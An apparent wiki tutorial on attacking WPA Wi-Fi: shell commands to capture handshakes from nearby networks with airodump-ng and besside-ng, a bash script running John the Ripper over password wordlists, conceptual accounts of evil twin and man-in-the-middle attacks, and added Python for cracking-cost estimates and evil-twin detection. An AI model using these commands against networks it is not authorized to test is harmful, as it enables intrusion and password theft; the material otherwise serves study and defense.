From charlesreid1

Reboot

Revisiting some of the old techniques.

Classic WPA Cracking

Monitor wireless

First, use the aircrack-ng suite to monitor wifi networks.

Start by putting the wifi card in monitor mode:

$ ifconfig wlan1 down; iwconfig wlan1 mode monitor; ifconfig wlan1 up

Now you can use that interface to scan for wireless network activity:

$ airodump-ng -w output_file wlan1

This writes information about wireless network activity (networks, clients, captured frames) to files with the given prefix.

Obtain handshakes

You can use the aircrack-ng tools to monitor wireless activity and verify that there are, in fact, clients connected to networks - a critical component in obtaining handshakes. The next step is to use besside-ng to obtain handshakes the Joe Pesci way.

Specify -W for WPA only, and specify your network interface:

$ besside-ng -W wlan1

That will put the handshakes in a cap file, and the names of the networks whose handshakes were obtained in a log file.

Crack handshakes

Once we have the handshakes, use the instructions on the John the Ripper/WPA page to turn those cap files into hccap files, then into John the Ripper password files.

$ /root/codes/cap2hccap/cap2hccap.bin /root/box/08_besside/wpa.cap wpa.hccap
$ hccap2john ./wpa.hccap > booty.johnpw

Now the goal is to crack booty.johnpw with John the Ripper. To do this, we will need to try a variety of wordlists, and a variety of rulesets to modify the words in those wordlists. To do that, use a bash script:

#!/bin/bash
#
# Run John the Ripper against every *.johnpw file in ${pwdir},
# trying each ruleset against each wordlist in turn.
# (bash, not sh: the arrays below are a bash feature.)

# seclist passwords located in
# ~/codes/SecLists/Passwords
#
johndir="/usr/sbin"
johnbin="${johndir}/john"

cap="wpa.cap"

pwdir="/root/box/08_besside"

# Round 0: plain wordlists, no rules
rulesets=("")

#### Round 1
###rulesets=("KoreLogicRulesAppendYears")

#### Round 2
###rulesets=("KoreLogicRulesAppendYears"
###"KoreLogicRulesAppendNum"
###"KoreLogicRulesPrependNum"
###"KoreLogicRulesAppendNumNum"
###"KoreLogicRulesPrependNumNum"
###"KoreLogicRulesPrependYears"
###)

# a good selection of seclist passwords:
# phpbb.txt
# elitehacker.txt
# alleged-gmail-passwords.txt
# Sucuri_Top_Wordpress_Passwords.txt
# korelogic-password.txt
# hak5.txt
# rockyou.txt

wordlists=("/root/codes/SecLists/Passwords/phpbb.txt"
"/root/codes/SecLists/Passwords/elitehacker.txt"
"/root/codes/SecLists/Passwords/alleged-gmail-passwords.txt"
"/root/codes/SecLists/Passwords/Sucuri_Top_Wordpress_Passwords.txt"
"/root/codes/SecLists/Passwords/korelogic-password.txt"
"/root/codes/SecLists/Passwords/hak5.txt"
"/root/codes/SecLists/Passwords/rockyou.txt")

# ===========================
# The Actual Work

# Glob directly instead of parsing ls output, so odd filenames survive intact
for pwfile in "${pwdir}"/*.johnpw;
do
    echo ""
    echo ""
    echo "*** * * ** **** * ***** ** **  * * * ** ****"
    echo "* ** * *** **** ***  * ** ** *** * * * *** *"
    echo "  * ***** *  * * * *** * * * * *  ***  * * *"
    echo "* * * * * * *** **** * *** * * * * * * *** *"
    echo ""
    echo ""
    echo "Now on password file ${pwfile}"
    echo ""

    for rules in "${rulesets[@]}";
    do
        echo ""
        echo ""
        echo " .. . .. . .... ... . . ... .. . .. . . .  ."
        echo "... ... .. ...... . .. .  . .   ....  .... ."
        echo "... .  .. .  .  .  .. .... . .  . . . ... . "
        echo ""
        echo ""
        echo "Now on ruleset file ${rules}"
        echo ""

        for wordlist in "${wordlists[@]}";
        do
            echo ""
            echo "---------------------------"
            echo "Running John the Ripper with options:"
            echo "Wordlist: ${wordlist}"
            echo "Ruleset: ${rules}"
            echo "Password File: ${pwfile}"

            # Only pass --rules when a ruleset is set; an empty --rules= is not "no rules"
            ruleopt=()
            if [ -n "${rules}" ] ; then
                ruleopt=("--rules=${rules}")
            fi

            # print the command first, so the log shows exactly what ran
            echo "${johnbin} ${ruleopt[*]} --wordlist=${wordlist} --format=wpapsk ${pwfile}"

            # actually do it: john runs from its own directory, as before, but in a
            # subshell so a failed cd cannot leave the rest of the script elsewhere
            ( cd "${johndir}" || exit 1
              "${johnbin}" "${ruleopt[@]}" --wordlist="${wordlist}" --format=wpapsk "${pwfile}" )

        done
    done
done

Settle in, because we'll be here a while.
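To see why this takes a while, here is an added example (not code from the original page) of the derivation john repeats for every candidate under --format=wpapsk, checked against the IEEE 802.11 test vector, plus a back-of-envelope cost function for the wordlist-times-rules approach above. The derivation rate and wordlist sizes used are constructed assumptions; measure your own.

```python
import hashlib
import time

# IEEE 802.11 reference vector: passphrase "password", SSID "IEEE".
REFERENCE_PSK_HEX = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"

# Approximate line count of rockyou.txt, the largest list in the script above (assumption).
ROCKYOU_LINES = 14_344_392


def wpa_psk(passphrase: str, ssid: str) -> bytes:
    """Derive the 256-bit WPA/WPA2 PSK as the standard does:
    PBKDF2-HMAC-SHA1, 4096 iterations, the SSID as the salt.
    The SSID salt is why the same passphrase on two networks gives two different PSKs."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, dklen=32)


def measure_rate(samples: int = 20) -> float:
    """Rough single-core derivations per second on this machine (constructed candidates)."""
    start = time.perf_counter()
    for i in range(samples):
        wpa_psk("candidate%d" % i, "Linksys Home")
    return samples / (time.perf_counter() - start)


def seconds_to_exhaust(candidates: int, rate_per_second: float) -> float:
    """Worst-case time to try every candidate at the given derivation rate."""
    return candidates / rate_per_second


def random_passphrase_keyspace(length: int, alphabet_size: int) -> int:
    """Number of candidates for a uniformly random passphrase of this length."""
    return alphabet_size ** length


def years(seconds: float) -> float:
    return seconds / (365.25 * 24 * 3600)


if __name__ == "__main__":
    assert wpa_psk("password", "IEEE").hex() == REFERENCE_PSK_HEX
    rate = measure_rate()
    print("this core: %.0f PSK derivations/s" % rate)
    print("rockyou, no rules: %.1f hours" % (seconds_to_exhaust(ROCKYOU_LINES, rate) / 3600))
    # a random 12-char alphanumeric passphrase, assuming a 1M/s GPU rig
    print("random 12 chars @ 1M/s: %.0e years" %
          years(seconds_to_exhaust(random_passphrase_keyspace(12, 62), 1e6)))
```

The script's rulesets multiply the candidate count per wordlist, so the time scales linearly with the number of rule variants, and no amount of rules reaches a long random passphrase.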

Alternatives to Cracking WPA

So you don't wanna rent out a GPU box, spend a week trimming your fingernails, and spend the entire time hoping that somehow, magically, you'll nail the one-in-a-bazillion-million chance that you get it. That's understandable. Let's talk about alternative options. These are going to depend primarily on your target network and your scenario. For example, what kind of physical access to the primary wireless networking area do you have? What kind of antenna(s) are you using?

Client Attacks

Client attacks are essentially about tricking the client into connecting to you, and not the access point. These take advantage of the way wireless networks work to attack clients in various ways.

Evil Twin Attack:

In the evil twin attack, the attacker uses information publicly broadcast by clients to trick a client into thinking it sees an access point it remembers - but it's actually an evil twin. This allows the attacker to hijack the traffic going from the client to the (trusted-looking, evil) access point.

Evil Twin MITM:

The evil twin attack may be done as part of a wireless man-in-the-middle attack. Imagine you see your home router, a hundred feet away, but actually it's an evil twin AP from the hacker who lives across the street using a cantenna. You think you are connecting to your own AP, but you're actually connecting to their evil AP. They connect their end to an internet connection, and voila, all of your traffic passes through their hardware.

Evil Twin Passphrase Pickpocket:

This may also be done to steal the passphrase of your remembered networks - a la Hak5 Pineapple - in which case the conversation ends once the connection is initiated and the client sends over the (encrypted) Wifi password. The conversation goes something like this:

Sheep Client Device: Hello, attention everyone, I'm looking for "Linksys Home". Is anyone here "Linksys Home"?

(crickets)

Sheep Client Device: Hello, attention everyone, I'm looking for "Linksys Home". Is anyone here "Linksys Home"?

Evil Twin AP: (Listens for a bit)

Sheep Client Device: Hello, attention everyone, I'm looking for "Linksys Home". Is anyone here "Linksys Home"?

Evil Twin AP: (Puts on disguise) Well hello, yes, I am "Linksys Home." Over here. Yes, hello.

Sheep Client Device: Oh, wow! Boy am I glad I found you! I'm at the airport. You seem totally legit. Here's my wifi password. Can I check my email now?

Evil Twin AP: Thanks for the password. Let me validate it. I'll be right back... (Disappears)

This is possible because computers and phones are often set to "remember" wireless networks they have joined. When your device remembers a wireless network, it is added to a list of networks it knows, and whenever the wireless card is up and unconnected it constantly broadcasts requests for those particular networks. This is convenient if you don't want to have to enter your username and password every time you want to log in to your home network, but it is also information that can be used against you.
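The defensive counterpart to the evil twin scenario above, as an added example that is not part of the original page: given a monitor-mode survey of nearby beacons, flag any AP that advertises one of your own network names from a BSSID you do not own, and call out a security downgrade (an open twin) separately. The survey records and the allow-list of owned APs are constructed sample data.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Sighting:
    """One beacon source, as a monitor-mode survey (e.g. airodump-ng) would list it."""
    bssid: str
    essid: str
    channel: int
    privacy: str  # "WPA2", "WPA", "OPN", ...


# Constructed sample survey: the real home AP plus two impostors using its name.
SIGHTINGS = [
    Sighting("00:11:22:33:44:55", "Linksys Home", 6, "WPA2"),
    Sighting("aa:bb:cc:dd:ee:01", "Linksys Home", 11, "WPA2"),  # same name, unknown BSSID
    Sighting("aa:bb:cc:dd:ee:02", "Linksys Home", 1, "OPN"),    # open twin, no key needed
    Sighting("66:77:88:99:aa:bb", "CoffeeShop", 1, "OPN"),       # not ours, ignored
]

# Constructed allow-list of the APs you actually own: ESSID -> BSSIDs and expected security.
AUTHORIZED = {
    "Linksys Home": {"bssids": {"00:11:22:33:44:55"}, "privacy": "WPA2"},
}


def detect_evil_twins(sightings, authorized):
    """Return (bssid, essid, channel, reason) for every beacon that advertises one of
    our ESSIDs from a BSSID we do not own. A privacy mismatch is appended to the reason,
    since an open twin is how a client gets lured on without the attacker knowing the key."""
    alerts = []
    for s in sightings:
        known = authorized.get(s.essid)
        if known is None:
            continue  # someone else's network; nothing to compare against
        if s.bssid.lower() in {b.lower() for b in known["bssids"]}:
            continue  # one of ours
        reason = "unknown BSSID advertising a managed ESSID"
        if s.privacy != known["privacy"]:
            reason += " with mismatched security (%s, expected %s)" % (s.privacy, known["privacy"])
        alerts.append((s.bssid, s.essid, s.channel, reason))
    return alerts


if __name__ == "__main__":
    for bssid, essid, channel, reason in detect_evil_twins(SIGHTINGS, AUTHORIZED):
        print("ALERT: %s (%s) on channel %d: %s" % (bssid, essid, channel, reason))
```

On the client side, the mitigation is the one the dialogue implies: forget networks you no longer use, so your device stops asking for them in the airport.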

Man in the Middle Attack:

A man-in-the-middle attack involves an attacker sitting between two parties, Alice and Bob, forwarding all traffic from Alice along to Bob and all traffic from Bob along to Alice, while also getting to read all of the traffic in the process.
